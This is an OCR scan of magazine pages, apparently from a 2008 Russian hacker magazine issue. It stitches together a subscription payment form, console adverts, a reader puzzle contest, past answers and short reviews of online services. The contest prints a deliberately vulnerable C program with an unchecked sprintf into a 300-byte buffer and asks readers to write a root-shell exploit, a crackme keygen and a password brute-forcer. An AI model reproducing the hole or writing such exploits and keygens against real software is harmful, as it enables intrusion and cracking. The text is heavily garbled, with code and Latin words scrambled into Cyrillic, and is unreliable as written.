ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 

□ на 12 месяцев 

начиная с 



. 2008 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 



Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



область/край 



город 



улица 



дом 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 




Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Подпись плательщика 






Програмы и презентации с КНрдгаЬЬег 0.8.1 ХАКЕРСКИЕ АТАКИ ГОСПОРТАЛОВ ГРУЗИИ 




к I 



8003 Ясіды>ю (81- 1)01. °Ы 

































Гр*Гіуйіея лѵ^і- ^ры 1 Ді}^Г Линий уіХіГійын 
»Сл^ССЬЫі> НСЛЕДЗЙ НІПЛЙПИВ 

Звоните 47 ЩЩ ТІО 63 25 
ншивіишніе яаІиаі^атириШ 



ІШпІепсіо ѴѴіі 



РІауЗіайоп 2 ЗІІт ХЬох 360 мм™ «мнив 



9984 р. 5200 р. 1 2220 р. 



НЕ СКУЧАЙ! 
ДОМА И 
В ДОРОГЕ 






I 









ИГРАМ! 



РІауЗІаІіоп 3 (406Ь) 

15990 р. 




Зону Р5Р Зііт 

Вазе РэсК ВІзск *Р 5 Р- 20 ОВ.Ліг 5 ) 



принимаем заказы через 
Интернет и по телефону 



Возможность доставки 
в день заказа 



Огромный выбор 
компьютерных и видеоигр 




ГгчІГіл^Ъи* 
'І 2 : Штвді *Ё 1ч 
іт Р 





Х-РѴИІЕ 

Ш ИВАН СКЛЯРОВ 

I / ХРЦ22І.Е@ПЕАІ.. ХАКЕР. ВЦ / 



Ц сіеіепсіег 

Удобство складывается из мелочей 




N0 Ы0-ПРИЗЫ ОТ ОЕРЕ№ЕК 

В ЭТОМ МЕСЯЦЕ ПЕРВЫЕ ПЯТЬ ПОБЕДИТЕЛЕЙ НАШЕГО 
КОНКУРСА ПОЛУЧАТ ПО ЗАШИБЕННОЙ ЛАЗЕРНОЙ 

мышке РЕРЕМОЕР Б ЮСАКІЧО 705 №N0. 



ПРИСЫЛАЙ ОТВЕТЫ НАРЦ22І_Е(й>РЕАІ_.ХАКЕР.Ки, 

ДАЖЕ ЕСЛИ ТЫ СМОГ ОТВЕТИТЬ ВСЕГО 
НА ОДИН ПАЗЛ. 



УСТАЛ? РАЗГРУЗИ МОЗГИ 
НА 



ѴѴѴУѴУ.ОЕРЕМОЕП.ВІІ. 



ПОБЕДА В ПРОСТОЙ ОНЛАЙН- 



ЯЙШПШ08ОО/16ООСРІ 

ШШШЖ В8 метров 

І 1ІІ 2.4ГГЦ 



Частота радиоинте 



' Функция 40-прокрутки 



Трехуровневая система экономии энергии 



РАСШИФРУЙ ТЕКСТ 



НАНОПРИЕМНИЮ 



Расшифруй текст, показанный на рисунке (файл косі.іхі с 
зашифрованным текстом можно найти на диске кжурналу]. 
Напиши программу для расшифровки этого текста. Под- 
сказка: для шифрования идешифрования используется 
один и тот же алгоритм. 



[ПРЕДСТАВЛЕНИЕ ПИ| 



Число ПИ (3,14...) закодировали по определенному 
алгоритму и получили шестнадцатеричное значение 
40490РОВН. Определи этот алгоритм и скажи, какс помо- 
щью него будетзакодирована постоянная е (2,718...), 



МОЖНО НЕ ВЫНИМАТЬ ИЗ У5В-П0РТА НОУТБУКА! 
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Напиши генератор регистрационных номеров для про 
граммы ІгаЬте. ВзятьІгаЬте.ехе можно на компакт- 
диске кжурналу. 









^ ипііг 






ЧУДЕСНЫЙ эксплоит 

Ниже показан сорец бажной программы. Напиши для нее эксплоит, запускающий оболочку 
системы с правами администратора. Желательно получить версии эксплоита под разные 
платформы: ѴѴі псіоѵѵз, І_іпих, В5Б и др. 



ИСХОДНЫЙ КОД УЯЗВИМОЙ ПРОГРАММЫ (НОІ.Е.С): 

#іпс1ис!е <зСс1іо.]і> 

#іпс1ис1е <зСгіпд.1і> 

#іпс1ис!е <сСуре.]т> 

ѵоісі сопѵегС (сЬаг *зСг) 

{ 

ѵЛііІе (*зСг 1= '\0') { 

*зСг=Соиррег ( *зСг ) А 7 ; 

++зСг ; 

} 

} 

іпС шаіп(іпС агдс, іпС *агдѵ[] ) 

{ 

сііаг Ьибб [3 00] ; 



СПЕЦ-БРУТФОРСЕР 

Известно, что пароли от некоторой системы 
имеют следующие закономерности: 

1. В формировании пароля принимаютучастие 
только символы с АБСІІ-кодами в диапазоне от 

21Ьдо7еЬ. 

2 . Количество символов пароля может менять- 
ся от 6 до 40. 

3. Па рол ь всегда содержит, ка к м и н и мум , три 
одинаковых символа. 

4 . Символы, занимающие четные позиции в 
пароле всегда имеютчетныеА5СІІ-коды, а сто- 
ящие на нечетных позициях — всегда нечетные 
А5СІ 1-коды. 

5 . Пароль не может состоять из полностью 
одинаковых символов. 

Напиши на любом языке брутфорсер паролей с 
учетом перечисленныхусловий. 



ІП (агдс==2) { 



сопѵегС (агдѵ[1] ) ; 

±6 ( ! зСгпсшр (агдѵ [1] , "XXX" , 3 ) ) { 
зргіпСГ (Ьибб , "%з", агдѵ[1]); 
ргіпСГ ("ОК! ") ; 

} 

} еізе 

ргіпСП ( "ЕпСег агдишепС ! \п") ; 
геСигп 0 ; 

} 



ПРИЗЫ И ПОБЕДИТЕЛИ. 

ОБЪЯВЛЯЕМ ПОБЕДИТЕЛЕЙ ПРО- 
ШЛОГО КОНКУРСА! 

1- е место: заткагйріаѵзк.іиіа.пеі: 

2- е место: збеІіз1:оѵ_ѵ(дппаі1.ги 

3- е место: хеепусбйдтаіі.сопп 




ПОБЕДИТЕЛИ ПОЛУЧАЮТ ПО ПОЛУ- 
ГОДОВОЙ ПОДПИСКЕ НАз=. 



ОТВЕТЫ НА ВОПРОСЫ ПРОШЛОГО НОМЕРА 



СЪЕШЬ МЕНЯ 

Правильный пароль: Ьаскег^искег. Исходный 
код еаіте.ехе можно найти на диске кжурналу 
или на моем сайте ѵѵѵѵѵѵ.зкіѵаго^.ги . 

ВОССТАНОВИ БАЙТЫ 

Байты необходимые, чтобы программа работа- 
ла правильно: 35Ь, 37Ь, 48Ь. 

Программа на самом деле представляет собой 
немного модифицированныйтестовый вирус 
ЕІСАР для тестирования антивирусов [ ѵѵѵѵѵѵ. 
еісаг.огд/апб ѵігиз 1е5І ЯІе.Ыт ]. 



АВАВА 

Зашифровано слово «зкіуаго^». Это простое 
задание на знание информатики, т. к. каждая 
буква закодирована с помощью двоичного кода 
Фрэнсиса Бэкона: а — ААААА, Ь — ААААВ, с 
— АААВА, б — АААВ В и т. д. 



ЗАГАДОЧНОЕ УРАВНЕНИЕ 

Вместо знака вопроса должно стоять число 19. 
Уравнения представлены в 13-ричной системе 
счисления. 



ПОСТЕР 

Сообщение скрыто методом стеганографии посредством 
известной программы ЭРНБ. Это можно определить с 
помощью какой-нибудь дестеганографической утилиты, 
например, зіедсіеіесі:. Чтобы извлечьсообщение из 
файла требуется пароль — его можно найти на самом 
рисунке; это слово «зех». 



ХАКЕР 09 /117/ 08 
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55ЕМВІ.А.С0М 




Работая в команде с коллегами, которые находятся на другом конце кон- 
тинента, начинаешь понимать всю прелестьонлайн-сервисов, предна- 
значенныхдля так называемого соіабогабоп. А появлению специального 
сервиса для программистов я был особенно рад. АззетЫа включает в 
себя ѵѵікі, внутренние форумы, с и сте мути кето в и фиксации багов (Т гас], а 
также систему контроля версий Ѳіі и ЭиЬѵегзіоп. Супер! 



Это не совсем сервис. І_окі — специальный плагин для Рігебох, который 
постоянно обращается на сервер... чтобы определитьтвое месторасполо- 
жение. Для этого используется банальный 0Р5, информация о находя- 
щихся рядом сотовых вышках, а та кже точках доступа ѴѴі-Рі. Мы были 
Ісильноудивлены, чтоузападного сервиса есть база по крупным городам 
России, а сам он работает безупречно. 




_ 



] * 



лЯНЕР 



ГРАФИЧЕСКИМ 



онлайн-редактор; 




РІХІ.К.СОМ 



С развитием онлайн-сервисов и появлением новых движков для интер- 
претации ЭаѵаЗсгірІ’ов, онлайн-приложения все больше напоминают 
обычные десктопные. Также выглядят, также шустро работают. Ну, вот 
взятьхотя бы — Ріхіг. Неопытный пользователь едва ли заметит разницу в 
интерфейсе с нашим любимым РЬоІюзЬор’ом. Но повторюсь: это онлайн- 
сервис. Давно не запускаю Раіпі на чужом компе, достаточно зайти на 
Ріхіг.сот. 







СІ_ІРРЕВ2.С0М 



Устойчивые к взлому пароли, отличающиеся на разных сервисах — это | 
хорошо. Но сколько разутебя бывало, что в самый неподходящий момент 
ты забывал нужный пасс? Предлагаю решение. Доверить часть паролей 
(понятно, что банковские аккаунты просто такотдавать не стоит] сервису 
Сііррегг, который влюбой момент будетонлайн. Хочется верить, что ^ 
серверустойчив квзлому.а саму базу шифрует... 



► ібо 
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іКЕРСКАЯ ПОЧТА 
ЦОМЕНЕ гахдкЕР.гиі 



МѴѴ.ХАКЕР.КІІ 
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ЖУРНАЛ УЖЕ 







